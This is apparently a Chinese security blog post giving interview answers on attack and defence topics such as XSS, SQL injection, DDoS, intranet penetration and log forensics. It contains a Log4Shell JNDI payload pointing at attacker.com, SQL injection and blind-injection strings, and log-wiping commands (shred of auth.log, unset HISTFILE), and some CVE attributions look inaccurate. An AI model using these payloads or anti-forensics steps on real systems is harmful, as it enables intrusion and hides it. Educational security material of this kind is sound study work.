安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[121 病毒和蠕虫的区别](#121 病毒和蠕虫的区别)
[122 DNS欺骗(DNS Spoofing)](#122 DNS欺骗(DNS Spoofing))
[123 DDoS攻击类型](#123 DDoS攻击类型)
[124 陆地(LAND)攻击](#124 陆地(LAND)攻击)
[125 XSS漏洞类型与存储型XSS详解](#125 XSS漏洞类型与存储型XSS详解)
[126 & 130 渗透测试流程](#126 & 130 渗透测试流程)
[127 移动端APK调试经验](#127 移动端APK调试经验)
[128 云安全(Cloud Security)](#128 云安全(Cloud Security))
[129 虚拟机逃逸(VM Escape)](#129 虚拟机逃逸(VM Escape))
[131 渗透项目实战描述](#131 渗透项目实战描述)
[132 XSS漏洞修复方案](#132 XSS漏洞修复方案)
[133 SQL注入原理](#133 SQL注入原理)
[134 终端(PC)渗透经验](#134 终端(PC)渗透经验)
[135 新型漏洞案例(2023-2025)](#135 新型漏洞案例(2023-2025))
[136 企业内部安全建设](#136 企业内部安全建设)
[137 排序算法](#137 排序算法)
[138 JS密集型页面爬取方案](#138 JS密集型页面爬取方案)
[139 多线程/异步/协程/多路复用性能对比](#139 多线程/异步/协程/多路复用性能对比)
[140 浏览器常用编码](#140 浏览器常用编码)
[141 Web加密算法](#141 Web加密算法)
[142 内网渗透实战](#142 内网渗透实战)
[143 MySQL LIKE查询优化](#143 MySQL LIKE查询优化)
[144 CDN网站获取真实IP](#144 CDN网站获取真实IP)
[145 渗透身份隐藏](#145 渗透身份隐藏)
[146 主机入侵日志排查](#146 主机入侵日志排查)
[147 SQL注入修复](#147 SQL注入修复)
[148 安全研究方向与渗透工作](#148 安全研究方向与渗透工作)
[149 单网址渗透测试](#149 单网址渗透测试)
[150 SQL注入深度利用](#150 SQL注入深度利用)
121 病毒和蠕虫的区别 122 DNS欺骗是什么 123 DDOS有哪些 124 陆地land攻击是什么 125 xss有什么?执行存储型的xss的危害和原理 126 渗透测试流程? 127 有没有移动端的调试经验apk 128 对于云安全的理解 129 虚拟机逃逸的理解 130 渗透测试流程 131 描述渗透项目,做了什么 132 xss漏洞类型、详情、修复方案 133 SQL注入原理 134 终端的渗透经验 135 了解什么比较新的漏洞 136 企业内部安全 137 算法?了解过什么排序? 138 爬虫页面存在很多js的时候,用什么 139 多线程异步协程多路复用用哪一个最快为什么 140 浏览器的常用编码 141 web常用的加密算法有什么 142 有没有内网渗透的经验?怎么渗透?如果拿下了边界层的某一个机器,如何对内网其他进行探测? 143 mysql中like查询会会非常缓慢,如何进行优化 144 做了cdn的网站如何获取真实IP 145 渗透的时候如何隐藏自己的身份 146 主机疑似遭到入侵,要看哪里的日志 147 SQL注入漏洞怎么修复 148 安全研究的方面?做过哪些渗透测试的工作? 149 只给你一个网址,如何进行渗透测试 150 SQL注入,id=1如何检测?orderby怎么利用?limit语句怎么利用?盲注有什么?
121 病毒和蠕虫的区别
维度 病毒 (Virus) 蠕虫 (Worm) 传播方式 依附宿主文件(如EXE、文档) 独立传播,利用系统漏洞/网络服务 激活条件 需用户执行宿主程序 自动扫描扩散,无需用户交互 破坏目标 文件破坏、数据加密 消耗带宽、资源耗尽(如Mirai僵尸网络) 典型案例 CIH病毒、Melissa宏病毒 WannaCry、Conficker蠕虫
122 DNS欺骗(DNS Spoofing)
- 原理:攻击者伪造DNS响应包,将域名解析到恶意IP(如伪造银行网站IP)
- 技术手段 :
- ARP缓存投毒(局域网)
- 中间人攻击(MITM)
- 篡改路由器DNS设置
- 防御 :
- DNSSEC(DNS安全扩展)
- 使用HTTPS强制加密
- 本地DNS缓存锁定(如
dnscrypt-proxy)
123 DDoS攻击类型
类型 攻击原理 代表工具 流量型 耗尽带宽(UDP/ICMP洪水) LOIC、HOIC 协议型 消耗服务器资源(SYN洪水、Ping of Death) hping3、Scapy 应用层 高频请求耗尽CPU(HTTP慢速攻击、CC攻击) Slowloris、R.U.D.Y 反射放大 伪造源IP利用协议放大(NTP/DNS反射) Memcrashed、DRDoS
124 陆地(LAND)攻击
- 原理 :发送源IP=目标IP 且源端口=目标端口的SYN包,导致系统陷入循环崩溃(早期Windows/Linux受影响)
- 修复:现代系统已免疫,可配置防火墙丢弃源IP=目标IP的包
125 XSS漏洞类型与存储型XSS详解
XSS分类
类型 触发场景 持久性 反射型XSS URL参数即时返回恶意脚本 非持久 存储型XSS 恶意脚本存入数据库(如评论区) 持久 DOM型XSS 前端JS操作DOM时执行 非持久 存储型XSS危害
- 盗取Cookie :
document.cookie发送至攻击者服务器- 钓鱼攻击:伪造登录框窃取凭证
- 蠕虫传播:如Samy蠕虫(MySpace)
- 键盘记录:注入JS监控用户输入
修复方案
Javascript
// 输出编码(以PHP为例) htmlspecialchars($input, ENT_QUOTES, 'UTF-8'); // 内容安全策略(CSP) Header("Content-Security-Policy: default-src 'self'");
126 & 130 渗透测试流程
- 信息收集
- WHOIS/子域名扫描(Amass)
- 端口扫描(Nmap/Masscan)
- 指纹识别(Wappalyzer)
- 威胁建模
- 绘制攻击面(OWASP Threat Dragon)
- 确定高危组件(如暴露的Jenkins)
- 漏洞分析
- 自动化扫描(Nessus/Burp Suite)
- 手动验证(如SQL注入绕过WAF)
- 渗透利用
- 获取初始立足点(如Webshell)
- 权限提升(Linux脏牛漏洞)
- 后渗透
- 横向移动(Pass-The-Hash)
- 数据窃取/痕迹清理
- 报告输出
- 风险评级(CVSS评分)
- 修复建议(附PoC代码)
127 移动端APK调试经验
- 工具链 :
- 反编译:JADX、APKTool
- 动态调试:Frida(Hook关键函数)、Xposed
- 流量分析:Burp Suite + 证书绑定绕过(Objection)
- 常见漏洞 :
- 硬编码密钥(
strings.xml)- 组件暴露(
AndroidManifest.xml中exported=true)- 非加密通信(HTTP明文传输)
128 云安全(Cloud Security)
责任共担模型 :
层 用户责任 云商责任 基础设施 - 物理安全、硬件维护 平台层 中间件配置、访问控制 虚拟化隔离、补丁 应用层 代码安全、数据加密 - 关键风险 :
- 配置错误(如公开的S3桶)
- 影子IT(未授权云服务使用)
- 跨租户攻击(如Azure跨账户漏洞)
129 虚拟机逃逸(VM Escape)
- 原理:利用Hypervisor漏洞(如CVE-2021-22061)使Guest OS控制Host
- 案例 :
- VMware Workstation 漏洞(
vmware-vmx.exe提权)- Xen PV内核逃逸(XSA-304)
- 防御 :
- 最小化VM权限
- 启用Hypervisor保护(如Intel VT-d)
131 渗透项目实战描述
项目背景 :某金融系统Web应用测试
行动步骤:
- 通过子域名爆破发现测试环境(
test.pay.com)- 利用未授权访问下载Git源码(
.git泄露)- 分析代码发现硬编码数据库密码
- 连接数据库提取用户凭证(MD5哈希爆破)
- 横向渗透至内网Jenkins服务器(弱口令admin:admin)
- 构造恶意Job获取主机Shell
成果:提交12个高危漏洞报告,协助修复供应链风险
132 XSS漏洞修复方案
漏洞类型 修复方案 反射/存储型 输出编码 + 输入过滤(白名单正则如 /^[a-z0-9]+$/) + CSP策略DOM型 避免 innerHTML,使用textContent;校验location.hash内容通用防御 设置 HttpOnlyCookie;启用XSS过滤器(X-XSS-Protection)
133 SQL注入原理
Sql
-- 原始语句: SELECT * FROM users WHERE id = '$input'; -- 攻击输入: ' OR 1=1 -- -- 最终语句: SELECT * FROM users WHERE id = '' OR 1=1 -- '; (返回所有用户)
- 关键点:用户输入未过滤拼接至SQL语句
- 利用工具:sqlmap(自动检测/拖库)
134 终端(PC)渗透经验
- 初始立足 :
- 鱼叉攻击(恶意PDF漏洞CVE-2021-40444)
- 供应链攻击(破解软件植入后门)
- 权限维持 :
- Windows:注册表自启动项、计划任务
- Linux:crontab、.bashrc后门
- 对抗EDR :
- 进程注入(Process Hollowing)
- 无文件攻击(PowerShell内存执行)
135 新型漏洞案例(2023-2025)
- Log4j2 JNDI注入 (CVE-2021-44228)
- 利用:
${jndi:ldap://attacker.com/exp}- 影响:全球70%企业系统
- Spring4Shell (CVE-2022-22965)
- 利用:Tomcat JDK9+环境下参数绑定RCE
- Citrix ADC身份绕过 (CVE-2023-3519)
- 未授权代码执行(政府机构高频目标)
136 企业内部安全建设
- 零信任架构 :
- 微隔离(软件定义边界)
- 持续身份验证(BeyondCorp)
- 威胁狩猎 :
- 利用ELK+Sigma规则检测异常行为
- 内存取证(Volatility排查无文件攻击)
- 员工意识 :
- 钓鱼演练(如GoPhish模拟攻击)
- 最小权限原则(RBAC模型)
137 排序算法
算法 时间复杂度 适用场景 快速排序 O(n log n) 大规模通用数据(原地排序) 归并排序 O(n log n) 链表排序、外部排序 堆排序 O(n log n) 实时系统(最坏情况稳定) Timsort O(n)~O(n log n) Python/Java内置(混合算法)
138 JS密集型页面爬取方案
- 动态渲染引擎 :
- Headless Chrome(Puppeteer/Playwright)
- 执行JS后提取DOM(
page.content())- API逆向 :
- 抓包分析XHR请求(Chrome DevTools)
- 模拟Ajax参数(如Token签名)
- WebAssembly解析 :
- 使用WASM虚拟机执行关键逻辑(Pyodide)
139 多线程/异步/协程/多路复用性能对比
模型 吞吐量 资源消耗 适用场景 多线程 中 高(线程切换) CPU密集型任务 异步I/O 高 低 I/O密集型(如爬虫) 协程 极高 最低 高并发网络服务(单机10万+连接) 多路复用 高 低 网络服务器(Nginx/Redis) 协程优势:用户态调度无内核切换开销(如Python asyncio、Go goroutine)
140 浏览器常用编码
- URL编码 :
%20(空格)、%E4%B8%AD(UTF-8中文)- Base64 :
btoa("hello")→"aGVsbG8="- HTML实体 :
< → <、© → ©- Unicode转义 :
\u4e2d(中)
141 Web加密算法
类型 算法 应用场景 对称加密 AES-256-GCM HTTPS数据传输 非对称加密 RSA-3072/ECC secp384 SSL证书、密钥交换 哈希算法 SHA-3/Bcrypt 密码存储、数据完整性 国密算法 SM4/SM9 中国政府机构系统
142 内网渗透实战
步骤:
- 信息收集 :
- ARP扫描(
arp-scan)- SMB枚举(
crackmapexec)- 横向移动 :
- Pass-The-Ticket(Kerberos)
- NTLM中继攻击(Responder)
- 权限提升 :
- 组策略首选项漏洞(GPP密码)
- DLL劫持(Windows服务路径)
- 域控攻陷 :
- Zerologon(CVE-2020-1472)重置域管密码
- DCSync导出所有用户哈希
143 MySQL LIKE查询优化
- 问题 :
%keyword%无法使用索引(全表扫描)- 优化方案 :
- 前缀索引 :
WHERE name LIKE 'key%'(可走索引)- 全文索引 :对长文本启用
FULLTEXT索引 +MATCH() AGAINST()- 分词检索:集成Elasticsearch分词查询
- 覆盖索引 :
SELECT indexed_col FROM table WHERE col LIKE '%x%'
144 CDN网站获取真实IP
- 历史记录查询 :
- DNS历史(SecurityTrails)
- 子域名扫描(可能未接入CDN)
- 技术漏洞利用 :
- 邮件服务器源IP(注册找回密码功能)
- SSRF漏洞读取云元数据(AWS:169.254.169.254)
- 网络层探测 :
- TCP TIMESTAMP差异(工具:CloudPiercer)
- 特定端口扫描(CDN未覆盖的非常用端口)
145 渗透身份隐藏
- 网络层 :
- VPN跳板 + Tor(多层加密)
- 使用公共WiFi(非实名认证)
- 攻击链隐匿 :
- 慢速扫描(降低IDS检测率)
- 加密通信(HTTPS隧道传输C2流量)
- 痕迹清理 :
- 禁用Shell历史(
unset HISTFILE)- 覆盖日志文件(
shred -z /var/log/auth.log)
146 主机入侵日志排查
日志路径 关键内容 /var/log/auth.logSSH登录记录(成功/失败) /var/log/syslog系统进程异常行为 Windows Event Log安全事件ID 4624/4625(登录) ~/.bash_history攻击者执行的命令 内存分析 使用Volatility检测恶意进程
147 SQL注入修复
参数化查询 (核心防御):
Python
# Python示例(使用Psycopg2) cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))ORM框架:SQLAlchemy/Hibernate避免手写SQL
WAF规则 :拦截
UNION SELECT、SLEEP()等特征最小权限 :数据库账户禁用
FILE_PRIV、DROP权限
148 安全研究方向与渗透工作
- 研究方向 :
- IoT固件逆向(ARM架构漏洞挖掘)
- AI安全(对抗样本攻击)
- 渗透工作 :
- 红队演练(模拟APT攻击)
- 漏洞众测(HackerOne/Bugcrowd)
- 安全工具开发(定制化扫描器)
149 单网址渗透测试
- 基础信息 :
- 域名Whois + ASN归属
- 端口扫描(
naabu -p 1-65535)- Web层攻击 :
- 目录爆破(
dirsearch -u url)- 框架漏洞(如Shiro反序列化)
- 突破边界 :
- 文件上传绕过(Content-Type/00截断)
- SSRF攻击内网Redis
- 权限提升 :
- 利用内核漏洞(DirtyPipe)
- 数据库UDF命令执行
150 SQL注入深度利用
id=1检测 :
- 逻辑测试:
id=1' and '1'='1(真)/and '1'='2(假)- 错误回显:
id=1'(触发语法错误)ORDER BY利用 :
- 判断列数:
ORDER BY 5--(直至报错)- 数据泄露:
ORDER BY (SELECT password FROM users LIMIT 1)LIMIT注入 :
- 联合查询限制:
UNION SELECT 1,2,3 LIMIT 1,1--- 盲注技术 :
- 布尔盲注:
and substring(database(),1,1)='a'- 时间盲注:
and if(1=1,sleep(5),0)- 报错盲注:
and extractvalue(1,concat(0x7e,(select user())))